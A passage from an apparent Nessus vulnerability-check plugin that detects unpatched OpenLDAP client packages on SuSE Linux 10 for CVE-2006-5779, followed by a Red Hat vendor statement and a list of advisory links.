security-related patch." ); script_set_attribute( attribute:"description", value: "OpenLDAP libldap's strval2strlen() function contained a bug when processing the authcid string of certain Bind Requests, which could allow attackers to cause an affected application (especially the OpenLDAP Server) to crash. (CVE-2006-5779)" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2006-5779.html" ); script_set_attribute(attribute:"solution", value:"Apply ZYPP patch number 2291."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux"); script_set_attribute(attribute:"patch_publication_date", value:"2006/11/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/12/13"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled."); if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE."); if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages."); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) exit(1, "Failed to determine the architecture type."); if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 10 on the '"+cpu+"' architecture have not been implemented."); flag = 0; if (rpm_check(release:"SLED10", sp:0, reference:"openldap2-client-2.3.19-18.11")) flag++; if (rpm_check(release:"SLED10", sp:0, cpu:"x86_64", reference:"openldap2-client-32bit-2.3.19-18.11")) flag++; if (rpm_check(release:"SLES10", sp:0, reference:"openldap2-client-2.3.19-18.11")) flag++; if (rpm_check(release:"SLES10", sp:0, cpu:"x86_64", reference:"openldap2-client-32bit-2.3.19-18.11")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else exit(0, "The host is not affected.");
Statements
| contributor | Joshua Bressers |
| lastmodified | 2007-03-14 |
| organization | Red Hat |
| statement | Not Vulnerable. The OpenLDAP versions shipped with Red Hat Enterprise Linux 4 and earlier do not contain the vulnerable code in question. Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch. |
References
- http://gleg.net/downloads/VULNDISCO_META_FREE.tar.gz
- http://gleg.net/vulndisco_meta.shtml
- http://www.securityfocus.com/bid/20939
- http://securitytracker.com/id?1017166
- http://secunia.com/advisories/22750
- http://www.openldap.org/its/index.cgi/Software%20Bugs?id=4740
- http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.033-openldap.html
- http://www.ubuntu.com/usn/usn-384-1
- http://secunia.com/advisories/22953
- http://secunia.com/advisories/22996
- http://www.novell.com/linux/security/advisories/2006_72_openldap2.html
- http://secunia.com/advisories/23133
- http://security.gentoo.org/glsa/glsa-200611-25.xml
- http://www.trustix.org/errata/2006/0066/
- http://secunia.com/advisories/23125
- http://secunia.com/advisories/23152
- https://issues.rpath.com/browse/RPL-820
- http://secunia.com/advisories/23170
- http://www.mandriva.com/security/advisories?name=MDKSA-2006:208
- http://securityreason.com/securityalert/1831
- http://www.vupen.com/english/advisories/2006/4379
- https://exchange.xforce.ibmcloud.com/vulnerabilities/30076
- http://www.securityfocus.com/archive/1/450728/100/0/threaded